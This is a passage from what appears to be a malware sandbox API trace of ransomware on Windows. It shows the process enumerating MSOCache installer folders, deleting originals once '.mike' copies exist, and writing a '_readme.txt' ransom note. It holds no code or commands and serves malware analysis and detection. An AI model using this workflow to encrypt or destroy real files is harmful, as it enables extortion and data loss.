Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.233] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x227bf3c | out: lpFileInformation=0x227bf3c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe22e38c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe22e38c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe22e38c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1920)) returned 1 [0040.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.233] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.233] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0040.234] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.234] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0040.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.235] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.235] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.236] GetFileType (hFile=0x264) returned 0x1 [0040.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.236] GetFileType (hFile=0x264) returned 0x1 [0040.236] WriteFile (in: hFile=0x264, lpBuffer=0x227dc20*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x227dc20*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.237] CloseHandle (hObject=0x264) returned 1 [0040.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.237] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.237] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.237] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22e38c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe22e38c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.238] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22e38c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe22e38c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.238] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0040.238] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0040.238] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0040.238] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0040.238] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe224b340, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe224b340, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe224b340, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x550, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.xml.mike", cAlternateFileName="PROOFI~1.MIK")) returned 1 [0040.239] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe22e38c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe22e38c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe22e38c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1920, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0040.239] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe22e38c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe22e38c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2309a20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.239] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe22e38c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe22e38c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2309a20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.239] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.239] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpFilePart=0x0) returned 0x47 [0040.239] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.239] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.239] CoTaskMemFree (pv=0x4fe370) [0040.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.240] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpFilePart=0x0) returned 0x47 [0040.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0040.240] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpFilePart=0x0) returned 0x47 [0040.240] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpFilePart=0x0) returned 0x48 [0040.240] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.240] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.240] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0040.240] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0040.240] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0040.241] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.241] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0040.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0040.241] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpFilePart=0x0) returned 0x51 [0040.241] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", lpFilePart=0x0) returned 0x51 [0040.241] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.241] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.241] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0040.241] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.255] GetFileType (hFile=0x264) returned 0x1 [0040.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0040.255] GetFileType (hFile=0x264) returned 0x1 [0040.255] CloseHandle (hObject=0x264) returned 1 [0040.255] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.255] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.255] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0040.255] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0040.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0040.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.256] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x2287c94 | out: lpFileInformation=0x2287c94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543)) returned 1 [0040.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.256] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.256] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x2287fd0 | out: lpFileInformation=0x2287fd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543)) returned 1 [0040.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.256] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.256] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0040.256] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0040.256] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.256] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.257] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.257] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0040.257] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, 